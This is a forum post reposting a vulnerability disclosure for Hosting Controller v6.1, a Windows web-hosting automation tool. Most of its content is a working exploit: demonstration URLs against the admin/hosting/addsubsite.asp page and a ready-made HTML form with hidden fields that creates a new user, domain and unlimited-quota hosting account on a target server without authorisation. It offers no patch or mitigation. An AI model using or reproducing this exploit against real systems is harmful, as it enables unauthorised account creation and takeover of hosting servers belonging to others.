Jump to content
xisto Community
Sign in to follow this  
pas75

Hosting Controller V.6.1 Vulnerability Hosting Controller v.6.1 Vulnerability

Recommended Posts

Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform.This vulnerability is on the admin/hosting/addsubsite.aspAttacker can create user and host on the target system.Exploit---------A demonstration exploit URL is provided:h**p://[target]/admin/hosting/addsubsite.asp?loginname=Mouse&password=123456h**p://[target]:8077/hosting/addsubsite.asp?loginname=Mouse&password=123456--><FORM action="h**p://[target]/admin/hosting/addsubsite.asp" method="post"><INPUT type="hidden" name="reseller" value="resadmin" id="reseller" ><INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">Domain: <INPUT name="DomainName" value="shabgard.org" id="Hidden2"><BR>Username: <INPUT name="loginname" value="Mouse" id="Hidden3"><BR><INPUT type="hidden" name="Quota" value="-1" id="Hidden4"><INPUT type="hidden" name="htype" value="27" id="htype" ><INPUT type="hidden" name="choice" value="1" id="Hidden7" ><INPUT type="hidden" name="mailaccess" value="TRUE" id="Hidden5">Mailserver: <INPUT name="MailServerType" value="IMail" id="Hidden6"><BR>Password: <INPUT name="password" value="123456" id="Hidden8"><BR><BR><input type="submit" value="Make"><BR>

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

×
×
  • Create New...

Important Information

Terms of Use | Privacy Policy | Guidelines | We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.